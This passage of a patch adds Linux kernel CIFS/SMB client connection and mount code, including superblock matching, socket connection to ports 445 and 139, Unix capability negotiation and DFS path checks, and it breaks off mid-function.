++cifs_match_super(struct super_block *sb, void *data)
++{
++	struct cifs_mnt_data *mnt_data = data;
++	struct smb3_fs_context *ctx;
++	struct cifs_sb_info *cifs_sb;
++	struct TCP_Server_Info *tcp_srv;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	int rc = 0;
++
++	spin_lock(&cifs_tcp_ses_lock);
++	cifs_sb = CIFS_SB(sb);
++
++	/* We do not want to use a superblock that has been shutdown */
++	if (CIFS_MOUNT_SHUTDOWN & cifs_sb->mnt_cifs_flags) {
++		spin_unlock(&cifs_tcp_ses_lock);
++		return 0;
++	}
++
++	tlink = cifs_get_tlink(cifs_sb_master_tlink(cifs_sb));
++	if (tlink == NULL) {
++		/* can not match superblock if tlink were ever null */
++		spin_unlock(&cifs_tcp_ses_lock);
++		return 0;
++	}
++	tcon = tlink_tcon(tlink);
++	ses = tcon->ses;
++	tcp_srv = ses->server;
++
++	ctx = mnt_data->ctx;
++
++	spin_lock(&tcp_srv->srv_lock);
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	spin_lock(&tcon->tc_lock);
++	if (!match_server(tcp_srv, ctx) ||
++	    !match_session(ses, ctx) ||
++	    !match_tcon(tcon, ctx) ||
++	    !match_prepath(sb, mnt_data)) {
++		rc = 0;
++		goto out;
++	}
++
++	rc = compare_mount_options(sb, mnt_data);
++out:
++	spin_unlock(&tcon->tc_lock);
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++	spin_unlock(&tcp_srv->srv_lock);
++
++	spin_unlock(&cifs_tcp_ses_lock);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++#ifdef CONFIG_DEBUG_LOCK_ALLOC
++static struct lock_class_key cifs_key[2];
++static struct lock_class_key cifs_slock_key[2];
++
++static inline void
++cifs_reclassify_socket4(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	BUG_ON(!sock_allow_reclassification(sk));
++	sock_lock_init_class_and_name(sk, "slock-AF_INET-CIFS",
++		&cifs_slock_key[0], "sk_lock-AF_INET-CIFS", &cifs_key[0]);
++}
++
++static inline void
++cifs_reclassify_socket6(struct socket *sock)
++{
++	struct sock *sk = sock->sk;
++	BUG_ON(!sock_allow_reclassification(sk));
++	sock_lock_init_class_and_name(sk, "slock-AF_INET6-CIFS",
++		&cifs_slock_key[1], "sk_lock-AF_INET6-CIFS", &cifs_key[1]);
++}
++#else
++static inline void
++cifs_reclassify_socket4(struct socket *sock)
++{
++}
++
++static inline void
++cifs_reclassify_socket6(struct socket *sock)
++{
++}
++#endif
++
++/* See RFC1001 section 14 on representation of Netbios names */
++static void rfc1002mangle(char *target, char *source, unsigned int length)
++{
++	unsigned int i, j;
++
++	for (i = 0, j = 0; i < (length); i++) {
++		/* mask a nibble at a time and encode */
++		target[j] = 'A' + (0x0F & (source[i] >> 4));
++		target[j+1] = 'A' + (0x0F & source[i]);
++		j += 2;
++	}
++
++}
++
++static int
++bind_socket(struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	if (server->srcaddr.ss_family != AF_UNSPEC) {
++		/* Bind to the specified local IP address */
++		struct socket *socket = server->ssocket;
++		rc = socket->ops->bind(socket,
++				       (struct sockaddr *) &server->srcaddr,
++				       sizeof(server->srcaddr));
++		if (rc < 0) {
++			struct sockaddr_in *saddr4;
++			struct sockaddr_in6 *saddr6;
++			saddr4 = (struct sockaddr_in *)&server->srcaddr;
++			saddr6 = (struct sockaddr_in6 *)&server->srcaddr;
++			if (saddr6->sin6_family == AF_INET6)
++				cifs_server_dbg(VFS, "Failed to bind to: %pI6c, error: %d\n",
++					 &saddr6->sin6_addr, rc);
++			else
++				cifs_server_dbg(VFS, "Failed to bind to: %pI4, error: %d\n",
++					 &saddr4->sin_addr.s_addr, rc);
++		}
++	}
++	return rc;
++}
++
++static int
++ip_rfc1001_connect(struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	/*
++	 * some servers require RFC1001 sessinit before sending
++	 * negprot - BB check reconnection in case where second
++	 * sessinit is sent but no second negprot
++	 */
++	struct rfc1002_session_packet req = {};
++	struct smb_hdr *smb_buf = (struct smb_hdr *)&req;
++	unsigned int len;
++
++	req.trailer.session_req.called_len = sizeof(req.trailer.session_req.called_name);
++
++	if (server->server_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      server->server_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.called_name,
++			      DEFAULT_CIFS_CALLED_NAME,
++			      RFC1001_NAME_LEN_WITH_NULL);
++
++	req.trailer.session_req.calling_len = sizeof(req.trailer.session_req.calling_name);
++
++	/* calling name ends in null (byte 16) from old smb convention */
++	if (server->workstation_RFC1001_name[0] != 0)
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      server->workstation_RFC1001_name,
++			      RFC1001_NAME_LEN_WITH_NULL);
++	else
++		rfc1002mangle(req.trailer.session_req.calling_name,
++			      "LINUX_CIFS_CLNT",
++			      RFC1001_NAME_LEN_WITH_NULL);
++
++	/*
++	 * As per rfc1002, @len must be the number of bytes that follows the
++	 * length field of a rfc1002 session request payload.
++	 */
++	len = sizeof(req) - offsetof(struct rfc1002_session_packet, trailer.session_req);
++
++	smb_buf->smb_buf_length = cpu_to_be32((RFC1002_SESSION_REQUEST << 24) | len);
++	rc = smb_send(server, smb_buf, len);
++	/*
++	 * RFC1001 layer in at least one server requires very short break before
++	 * negprot presumably because not expecting negprot to follow so fast.
++	 * This is a simple solution that works without complicating the code
++	 * and causes no significant slowing down on mount for everyone else
++	 */
++	usleep_range(1000, 2000);
++
++	return rc;
++}
++
++static int
++generic_ip_connect(struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	__be16 sport;
++	int slen, sfamily;
++	struct socket *socket = server->ssocket;
++	struct sockaddr *saddr;
++
++	saddr = (struct sockaddr *) &server->dstaddr;
++
++	if (server->dstaddr.ss_family == AF_INET6) {
++		struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&server->dstaddr;
++
++		sport = ipv6->sin6_port;
++		slen = sizeof(struct sockaddr_in6);
++		sfamily = AF_INET6;
++		cifs_dbg(FYI, "%s: connecting to [%pI6]:%d\n", __func__, &ipv6->sin6_addr,
++				ntohs(sport));
++	} else {
++		struct sockaddr_in *ipv4 = (struct sockaddr_in *)&server->dstaddr;
++
++		sport = ipv4->sin_port;
++		slen = sizeof(struct sockaddr_in);
++		sfamily = AF_INET;
++		cifs_dbg(FYI, "%s: connecting to %pI4:%d\n", __func__, &ipv4->sin_addr,
++				ntohs(sport));
++	}
++
++	if (socket == NULL) {
++		rc = __sock_create(cifs_net_ns(server), sfamily, SOCK_STREAM,
++				   IPPROTO_TCP, &socket, 1);
++		if (rc < 0) {
++			cifs_server_dbg(VFS, "Error %d creating socket\n", rc);
++			server->ssocket = NULL;
++			return rc;
++		}
++
++		/* BB other socket options to set KEEPALIVE, NODELAY? */
++		cifs_dbg(FYI, "Socket created\n");
++		server->ssocket = socket;
++		socket->sk->sk_allocation = GFP_NOFS;
++		if (sfamily == AF_INET6)
++			cifs_reclassify_socket6(socket);
++		else
++			cifs_reclassify_socket4(socket);
++	}
++
++	rc = bind_socket(server);
++	if (rc < 0)
++		return rc;
++
++	/*
++	 * Eventually check for other socket options to change from
++	 * the default. sock_setsockopt not used because it expects
++	 * user space buffer
++	 */
++	socket->sk->sk_rcvtimeo = 7 * HZ;
++	socket->sk->sk_sndtimeo = 5 * HZ;
++
++	/* make the bufsizes depend on wsize/rsize and max requests */
++	if (server->noautotune) {
++		if (socket->sk->sk_sndbuf < (200 * 1024))
++			socket->sk->sk_sndbuf = 200 * 1024;
++		if (socket->sk->sk_rcvbuf < (140 * 1024))
++			socket->sk->sk_rcvbuf = 140 * 1024;
++	}
++
++	if (server->tcp_nodelay)
++		tcp_sock_set_nodelay(socket->sk);
++
++	cifs_dbg(FYI, "sndbuf %d rcvbuf %d rcvtimeo 0x%lx\n",
++		 socket->sk->sk_sndbuf,
++		 socket->sk->sk_rcvbuf, socket->sk->sk_rcvtimeo);
++
++	rc = socket->ops->connect(socket, saddr, slen,
++				  server->noblockcnt ? O_NONBLOCK : 0);
++	/*
++	 * When mounting SMB root file systems, we do not want to block in
++	 * connect. Otherwise bail out and then let cifs_reconnect() perform
++	 * reconnect failover - if possible.
++	 */
++	if (server->noblockcnt && rc == -EINPROGRESS)
++		rc = 0;
++	if (rc < 0) {
++		cifs_dbg(FYI, "Error %d connecting to server\n", rc);
++		trace_smb3_connect_err(server->hostname, server->conn_id, &server->dstaddr, rc);
++		sock_release(socket);
++		server->ssocket = NULL;
++		return rc;
++	}
++	trace_smb3_connect_done(server->hostname, server->conn_id, &server->dstaddr);
++	if (sport == htons(RFC1001_PORT))
++		rc = ip_rfc1001_connect(server);
++
++	return rc;
++}
++
++static int
++ip_connect(struct TCP_Server_Info *server)
++{
++	__be16 *sport;
++	struct sockaddr_in6 *addr6 = (struct sockaddr_in6 *)&server->dstaddr;
++	struct sockaddr_in *addr = (struct sockaddr_in *)&server->dstaddr;
++
++	if (server->dstaddr.ss_family == AF_INET6)
++		sport = &addr6->sin6_port;
++	else
++		sport = &addr->sin_port;
++
++	if (*sport == 0) {
++		int rc;
++
++		/* try with 445 port at first */
++		*sport = htons(CIFS_PORT);
++
++		rc = generic_ip_connect(server);
++		if (rc >= 0)
++			return rc;
++
++		/* if it failed, try with 139 port */
++		*sport = htons(RFC1001_PORT);
++	}
++
++	return generic_ip_connect(server);
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++void reset_cifs_unix_caps(unsigned int xid, struct cifs_tcon *tcon,
++			  struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
++{
++	/*
++	 * If we are reconnecting then should we check to see if
++	 * any requested capabilities changed locally e.g. via
++	 * remount but we can not do much about it here
++	 * if they have (even if we could detect it by the following)
++	 * Perhaps we could add a backpointer to array of sb from tcon
++	 * or if we change to make all sb to same share the same
++	 * sb as NFS - then we only have one backpointer to sb.
++	 * What if we wanted to mount the server share twice once with
++	 * and once without posixacls or posix paths?
++	 */
++	__u64 saved_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
++
++	if (ctx && ctx->no_linux_ext) {
++		tcon->fsUnixInfo.Capability = 0;
++		tcon->unix_ext = 0; /* Unix Extensions disabled */
++		cifs_dbg(FYI, "Linux protocol extensions disabled\n");
++		return;
++	} else if (ctx)
++		tcon->unix_ext = 1; /* Unix Extensions supported */
++
++	if (!tcon->unix_ext) {
++		cifs_dbg(FYI, "Unix extensions disabled so not set on reconnect\n");
++		return;
++	}
++
++	if (!CIFSSMBQFSUnixInfo(xid, tcon)) {
++		__u64 cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
++		cifs_dbg(FYI, "unix caps which server supports %lld\n", cap);
++		/*
++		 * check for reconnect case in which we do not
++		 * want to change the mount behavior if we can avoid it
++		 */
++		if (ctx == NULL) {
++			/*
++			 * turn off POSIX ACL and PATHNAMES if not set
++			 * originally at mount time
++			 */
++			if ((saved_cap & CIFS_UNIX_POSIX_ACL_CAP) == 0)
++				cap &= ~CIFS_UNIX_POSIX_ACL_CAP;
++			if ((saved_cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) == 0) {
++				if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP)
++					cifs_dbg(VFS, "POSIXPATH support change\n");
++				cap &= ~CIFS_UNIX_POSIX_PATHNAMES_CAP;
++			} else if ((cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) == 0) {
++				cifs_dbg(VFS, "possible reconnect error\n");
++				cifs_dbg(VFS, "server disabled POSIX path support\n");
++			}
++		}
++
++		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)
++			cifs_dbg(VFS, "per-share encryption not supported yet\n");
++
++		cap &= CIFS_UNIX_CAP_MASK;
++		if (ctx && ctx->no_psx_acl)
++			cap &= ~CIFS_UNIX_POSIX_ACL_CAP;
++		else if (CIFS_UNIX_POSIX_ACL_CAP & cap) {
++			cifs_dbg(FYI, "negotiated posix acl support\n");
++			if (cifs_sb)
++				cifs_sb->mnt_cifs_flags |=
++					CIFS_MOUNT_POSIXACL;
++		}
++
++		if (ctx && ctx->posix_paths == 0)
++			cap &= ~CIFS_UNIX_POSIX_PATHNAMES_CAP;
++		else if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) {
++			cifs_dbg(FYI, "negotiate posix pathnames\n");
++			if (cifs_sb)
++				cifs_sb->mnt_cifs_flags |=
++					CIFS_MOUNT_POSIX_PATHS;
++		}
++
++		cifs_dbg(FYI, "Negotiate caps 0x%x\n", (int)cap);
++#ifdef CONFIG_CIFS_DEBUG2
++		if (cap & CIFS_UNIX_FCNTL_CAP)
++			cifs_dbg(FYI, "FCNTL cap\n");
++		if (cap & CIFS_UNIX_EXTATTR_CAP)
++			cifs_dbg(FYI, "EXTATTR cap\n");
++		if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP)
++			cifs_dbg(FYI, "POSIX path cap\n");
++		if (cap & CIFS_UNIX_XATTR_CAP)
++			cifs_dbg(FYI, "XATTR cap\n");
++		if (cap & CIFS_UNIX_POSIX_ACL_CAP)
++			cifs_dbg(FYI, "POSIX ACL cap\n");
++		if (cap & CIFS_UNIX_LARGE_READ_CAP)
++			cifs_dbg(FYI, "very large read cap\n");
++		if (cap & CIFS_UNIX_LARGE_WRITE_CAP)
++			cifs_dbg(FYI, "very large write cap\n");
++		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_CAP)
++			cifs_dbg(FYI, "transport encryption cap\n");
++		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)
++			cifs_dbg(FYI, "mandatory transport encryption cap\n");
++#endif /* CIFS_DEBUG2 */
++		if (CIFSSMBSetFSUnixInfo(xid, tcon, cap)) {
++			if (ctx == NULL)
++				cifs_dbg(FYI, "resetting capabilities failed\n");
++			else
++				cifs_dbg(VFS, "Negotiating Unix capabilities with the server failed. Consider mounting with the Unix Extensions disabled if problems are found by specifying the nounix mount option.\n");
++
++		}
++	}
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++int cifs_setup_cifs_sb(struct cifs_sb_info *cifs_sb)
++{
++	struct smb3_fs_context *ctx = cifs_sb->ctx;
++
++	INIT_DELAYED_WORK(&cifs_sb->prune_tlinks, cifs_prune_tlinks);
++
++	spin_lock_init(&cifs_sb->tlink_tree_lock);
++	cifs_sb->tlink_tree = RB_ROOT;
++
++	cifs_dbg(FYI, "file mode: %04ho  dir mode: %04ho\n",
++		 ctx->file_mode, ctx->dir_mode);
++
++	/* this is needed for ASCII cp to Unicode converts */
++	if (ctx->iocharset == NULL) {
++		/* load_nls_default cannot return null */
++		cifs_sb->local_nls = load_nls_default();
++	} else {
++		cifs_sb->local_nls = load_nls(ctx->iocharset);
++		if (cifs_sb->local_nls == NULL) {
++			cifs_dbg(VFS, "CIFS mount error: iocharset %s not found\n",
++				 ctx->iocharset);
++			return -ELIBACC;
++		}
++	}
++	ctx->local_nls = cifs_sb->local_nls;
++
++	smb3_update_mnt_flags(cifs_sb);
++
++	if (ctx->direct_io)
++		cifs_dbg(FYI, "mounting share using direct i/o\n");
++	if (ctx->cache_ro) {
++		cifs_dbg(VFS, "mounting share with read only caching. Ensure that the share will not be modified while in use.\n");
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_RO_CACHE;
++	} else if (ctx->cache_rw) {
++		cifs_dbg(VFS, "mounting share in single client RW caching mode. Ensure that no other systems will be accessing the share.\n");
++		cifs_sb->mnt_cifs_flags |= (CIFS_MOUNT_RO_CACHE |
++					    CIFS_MOUNT_RW_CACHE);
++	}
++
++	if ((ctx->cifs_acl) && (ctx->dynperm))
++		cifs_dbg(VFS, "mount option dynperm ignored if cifsacl mount option supported\n");
++
++	if (ctx->prepath) {
++		cifs_sb->prepath = kstrdup(ctx->prepath, GFP_KERNEL);
++		if (cifs_sb->prepath == NULL)
++			return -ENOMEM;
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++	}
++
++	return 0;
++}
++
++/* Release all succeed connections */
++static inline void mount_put_conns(struct mount_ctx *mnt_ctx)
++{
++	int rc = 0;
++
++	if (mnt_ctx->tcon)
++		cifs_put_tcon(mnt_ctx->tcon);
++	else if (mnt_ctx->ses)
++		cifs_put_smb_ses(mnt_ctx->ses);
++	else if (mnt_ctx->server)
++		cifs_put_tcp_session(mnt_ctx->server, 0);
++	mnt_ctx->cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_POSIX_PATHS;
++	free_xid(mnt_ctx->xid);
++}
++
++/* Get connections for tcp, ses and tcon */
++static int mount_get_conns(struct mount_ctx *mnt_ctx)
++{
++	int rc = 0;
++	struct TCP_Server_Info *server = NULL;
++	struct cifs_ses *ses = NULL;
++	struct cifs_tcon *tcon = NULL;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	unsigned int xid;
++
++	xid = get_xid();
++
++	/* get a reference to a tcp session */
++	server = cifs_get_tcp_session(ctx, NULL);
++	if (IS_ERR(server)) {
++		rc = PTR_ERR(server);
++		server = NULL;
++		goto out;
++	}
++
++	/* get a reference to a SMB session */
++	ses = cifs_get_smb_ses(server, ctx);
++	if (IS_ERR(ses)) {
++		rc = PTR_ERR(ses);
++		ses = NULL;
++		goto out;
++	}
++
++	if ((ctx->persistent == true) && (!(ses->server->capabilities &
++					    SMB2_GLOBAL_CAP_PERSISTENT_HANDLES))) {
++		cifs_server_dbg(VFS, "persistent handles not supported by server\n");
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	/* search for existing tcon to this server share */
++	tcon = cifs_get_tcon(ses, ctx);
++	if (IS_ERR(tcon)) {
++		rc = PTR_ERR(tcon);
++		tcon = NULL;
++		goto out;
++	}
++
++	/* if new SMB3.11 POSIX extensions are supported do not remap / and \ */
++	if (tcon->posix_extensions)
++		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_POSIX_PATHS;
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	/* tell server which Unix caps we support */
++	if (cap_unix(tcon->ses)) {
++		/*
++		 * reset of caps checks mount to see if unix extensions disabled
++		 * for just this mount.
++		 */
++		reset_cifs_unix_caps(xid, tcon, cifs_sb, ctx);
++		spin_lock(&tcon->ses->server->srv_lock);
++		if ((tcon->ses->server->tcpStatus == CifsNeedReconnect) &&
++		    (le64_to_cpu(tcon->fsUnixInfo.Capability) &
++		     CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)) {
++			spin_unlock(&tcon->ses->server->srv_lock);
++			rc = -EACCES;
++			goto out;
++		}
++		spin_unlock(&tcon->ses->server->srv_lock);
++	} else
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		tcon->unix_ext = 0; /* server does not support them */
++
++	/* do not care if a following call succeed - informational */
++	if (!tcon->pipe && server->ops->qfs_tcon) {
++		server->ops->qfs_tcon(xid, tcon, cifs_sb);
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE) {
++			if (tcon->fsDevInfo.DeviceCharacteristics &
++			    cpu_to_le32(FILE_READ_ONLY_DEVICE))
++				cifs_dbg(VFS, "mounted to read only share\n");
++			else if ((cifs_sb->mnt_cifs_flags &
++				  CIFS_MOUNT_RW_CACHE) == 0)
++				cifs_dbg(VFS, "read only mount of RW share\n");
++			/* no need to log a RW mount of a typical RW share */
++		}
++	}
++
++	/*
++	 * Clamp the rsize/wsize mount arguments if they are too big for the server
++	 * and set the rsize/wsize to the negotiated values if not passed in by
++	 * the user on mount
++	 */
++	if ((cifs_sb->ctx->wsize == 0) ||
++	    (cifs_sb->ctx->wsize > server->ops->negotiate_wsize(tcon, ctx)))
++		cifs_sb->ctx->wsize = server->ops->negotiate_wsize(tcon, ctx);
++	if ((cifs_sb->ctx->rsize == 0) ||
++	    (cifs_sb->ctx->rsize > server->ops->negotiate_rsize(tcon, ctx)))
++		cifs_sb->ctx->rsize = server->ops->negotiate_rsize(tcon, ctx);
++
++	/*
++	 * The cookie is initialized from volume info returned above.
++	 * Inside cifs_fscache_get_super_cookie it checks
++	 * that we do not get super cookie twice.
++	 */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_FSCACHE)
++		cifs_fscache_get_super_cookie(tcon);
++
++out:
++	mnt_ctx->server = server;
++	mnt_ctx->ses = ses;
++	mnt_ctx->tcon = tcon;
++	mnt_ctx->xid = xid;
++
++	return rc;
++}
++
++static int mount_setup_tlink(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
++			     struct cifs_tcon *tcon)
++{
++	struct tcon_link *tlink;
++
++	/* hang the tcon off of the superblock */
++	tlink = kzalloc(sizeof(*tlink), GFP_KERNEL);
++	if (tlink == NULL)
++		return -ENOMEM;
++
++	tlink->tl_uid = ses->linux_uid;
++	tlink->tl_tcon = tcon;
++	tlink->tl_time = jiffies;
++	set_bit(TCON_LINK_MASTER, &tlink->tl_flags);
++	set_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
++
++	cifs_sb->master_tlink = tlink;
++	spin_lock(&cifs_sb->tlink_tree_lock);
++	tlink_rb_insert(&cifs_sb->tlink_tree, tlink);
++	spin_unlock(&cifs_sb->tlink_tree_lock);
++
++	queue_delayed_work(cifsiod_wq, &cifs_sb->prune_tlinks,
++				TLINK_IDLE_EXPIRE);
++	return 0;
++}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++/* Get unique dfs connections */
++static int mount_get_dfs_conns(struct mount_ctx *mnt_ctx)
++{
++	int rc;
++
++	mnt_ctx->fs_ctx->nosharesock = true;
++	rc = mount_get_conns(mnt_ctx);
++	if (mnt_ctx->server) {
++		cifs_dbg(FYI, "%s: marking tcp session as a dfs connection\n", __func__);
++		spin_lock(&mnt_ctx->server->srv_lock);
++		mnt_ctx->server->is_dfs_conn = true;
++		spin_unlock(&mnt_ctx->server->srv_lock);
++	}
++	return rc;
++}
++
++/*
++ * cifs_build_path_to_root returns full path to root when we do not have an
++ * existing connection (tcon)
++ */
++static char *
++build_unc_path_to_root(const struct smb3_fs_context *ctx,
++		       const struct cifs_sb_info *cifs_sb, bool useppath)
++{
++	char *full_path, *pos;
++	unsigned int pplen = useppath && ctx->prepath ?
++		strlen(ctx->prepath) + 1 : 0;
++	unsigned int unc_len = strnlen(ctx->UNC, MAX_TREE_SIZE + 1);
++
++	if (unc_len > MAX_TREE_SIZE)
++		return ERR_PTR(-EINVAL);
++
++	full_path = kmalloc(unc_len + pplen + 1, GFP_KERNEL);
++	if (full_path == NULL)
++		return ERR_PTR(-ENOMEM);
++
++	memcpy(full_path, ctx->UNC, unc_len);
++	pos = full_path + unc_len;
++
++	if (pplen) {
++		*pos = CIFS_DIR_SEP(cifs_sb);
++		memcpy(pos + 1, ctx->prepath, pplen);
++		pos += pplen;
++	}
++
++	*pos = '\0'; /* add trailing null */
++	convert_delimiter(full_path, CIFS_DIR_SEP(cifs_sb));
++	cifs_dbg(FYI, "%s: full_path=%s\n", __func__, full_path);
++	return full_path;
++}
++
++/*
++ * expand_dfs_referral - Update cifs_sb from dfs referral path
++ *
++ * cifs_sb->ctx->mount_options will be (re-)allocated to a string containing updated options for the
++ * submount.  Otherwise it will be left untouched.
++ */
++static int expand_dfs_referral(struct mount_ctx *mnt_ctx, const char *full_path,
++			       struct dfs_info3_param *referral)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	char *fake_devname = NULL, *mdata = NULL;
++
++	mdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options, full_path + 1, referral,
++					   &fake_devname);
++	if (IS_ERR(mdata)) {
++		rc = PTR_ERR(mdata);
++		mdata = NULL;
++	} else {
++		/*
++		 * We can not clear out the whole structure since we no longer have an explicit
++		 * function to parse a mount-string. Instead we need to clear out the individual
++		 * fields that are no longer valid.
++		 */
++		kfree(ctx->prepath);
++		ctx->prepath = NULL;
++		rc = cifs_setup_volume_info(ctx, mdata, fake_devname);
++	}
++	kfree(fake_devname);
++	kfree(cifs_sb->ctx->mount_options);
++	cifs_sb->ctx->mount_options = mdata;
++
++	return rc;
++}
++#endif
++
++/* TODO: all callers to this are broken. We are not parsing mount_options here
++ * we should pass a clone of the original context?
++ */
++int
++cifs_setup_volume_info(struct smb3_fs_context *ctx, const char *mntopts, const char *devname)
++{
++	int rc;
++
++	if (devname) {
++		cifs_dbg(FYI, "%s: devname=%s\n", __func__, devname);
++		rc = smb3_parse_devname(devname, ctx);
++		if (rc) {
++			cifs_dbg(VFS, "%s: failed to parse %s: %d\n", __func__, devname, rc);
++			return rc;
++		}
++	}
++
++	if (mntopts) {
++		char *ip;
++
++		rc = smb3_parse_opt(mntopts, "ip", &ip);
++		if (rc) {
++			cifs_dbg(VFS, "%s: failed to parse ip options: %d\n", __func__, rc);
++			return rc;
++		}
++
++		rc = cifs_convert_address((struct sockaddr *)&ctx->dstaddr, ip, strlen(ip));
++		kfree(ip);
++		if (!rc) {
++			cifs_dbg(VFS, "%s: failed to convert ip address\n", __func__);
++			return -EINVAL;
++		}
++	}
++
++	if (ctx->nullauth) {
++		cifs_dbg(FYI, "Anonymous login\n");
++		kfree(ctx->username);
++		ctx->username = NULL;
++	} else if (ctx->username) {
++		/* BB fixme parse for domain name here */
++		cifs_dbg(FYI, "Username: %s\n", ctx->username);
++	} else {
++		cifs_dbg(VFS, "No username specified\n");
++	/* In userspace mount helper we can get user name from alternate
++	   locations such as env variables and files on disk */
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int
++cifs_are_all_path_components_accessible(struct TCP_Server_Info *server,
++					unsigned int xid,
++					struct cifs_tcon *tcon,
++					struct cifs_sb_info *cifs_sb,
++					char *full_path,
++					int added_treename)
++{
++	int rc;
++	char *s;
++	char sep, tmp;
++	int skip = added_treename ? 1 : 0;
++
++	sep = CIFS_DIR_SEP(cifs_sb);
++	s = full_path;
++
++	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb, "");
++	while (rc == 0) {
++		/* skip separators */
++		while (*s == sep)
++			s++;
++		if (!*s)
++			break;
++		/* next separator */
++		while (*s && *s != sep)
++			s++;
++		/*
++		 * if the treename is added, we then have to skip the first
++		 * part within the separators
++		 */
++		if (skip) {
++			skip = 0;
++			continue;
++		}
++		/*
++		 * temporarily null-terminate the path at the end of
++		 * the current component
++		 */
++		tmp = *s;
++		*s = 0;
++		rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
++						     full_path);
++		*s = tmp;
++	}
++	return rc;
++}
++
++/*
++ * Check if path is remote (i.e. a DFS share).
++ *
++ * Return -EREMOTE if it is, otherwise 0 or -errno.
++ */
++static int is_path_remote(struct mount_ctx *mnt_ctx)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct TCP_Server_Info *server = mnt_ctx->server;
++	unsigned int xid = mnt_ctx->xid;
++	struct cifs_tcon *tcon = mnt_ctx->tcon;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++	char *full_path;
++
++	if (!server->ops->is_path_accessible)
++		return -EOPNOTSUPP;
++
++	/*
++	 * cifs_build_path_to_root works only when we have a valid tcon
++	 */
++	full_path = cifs_build_path_to_root(ctx, cifs_sb, tcon,
++					    tcon->Flags & SMB_SHARE_IS_IN_DFS);
++	if (full_path == NULL)
++		return -ENOMEM;
++
++	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
++
++	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
++					     full_path);
++	if (rc != 0 && rc != -EREMOTE)
++		goto out;
++
++	if (rc != -EREMOTE) {
++		rc = cifs_are_all_path_components_accessible(server, xid, tcon,
++			cifs_sb, full_path, tcon->Flags & SMB_SHARE_IS_IN_DFS);
++		if (rc != 0) {
++			cifs_server_dbg(VFS, "cannot query dirs between root and final path, enabling CIFS_MOUNT_USE_PREFIX_PATH\n");
++			cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++			rc = 0;
++		}
++	}
++
++out:
++	kfree(full_path);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++static void set_root_ses(struct mount_ctx *mnt_ctx)
++{
++	if (mnt_ctx->ses) {
++		spin_lock(&cifs_tcp_ses_lock);
++		mnt_ctx->ses->ses_count++;
++		spin_unlock(&cifs_tcp_ses_lock);
++		dfs_cache_add_refsrv_session(&mnt_ctx->mount_id, mnt_ctx->ses);
++	}
++	mnt_ctx->root_ses = mnt_ctx->ses;
++}
++
++static int is_dfs_mount(struct mount_ctx *mnt_ctx, bool *isdfs, struct dfs_cache_tgt_list *root_tl)
++{
++	int rc;
++	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
++	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
++
++	*isdfs = true;
++
++	rc = mount_get_conns(mnt_ctx);
++	/*
++	 * If called with 'nodfs' mount option, then skip DFS resolving.  Otherwise unconditionally
++	 * try to get an DFS referral (even cached) to determine whether it is an DFS mount.
++	 *
++	 * Skip prefix path to provide support for DFS referrals from w2k8 servers which don't seem
++	 * to respond with PATH_NOT_COVERED to requests that include the prefix.
++	 */
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
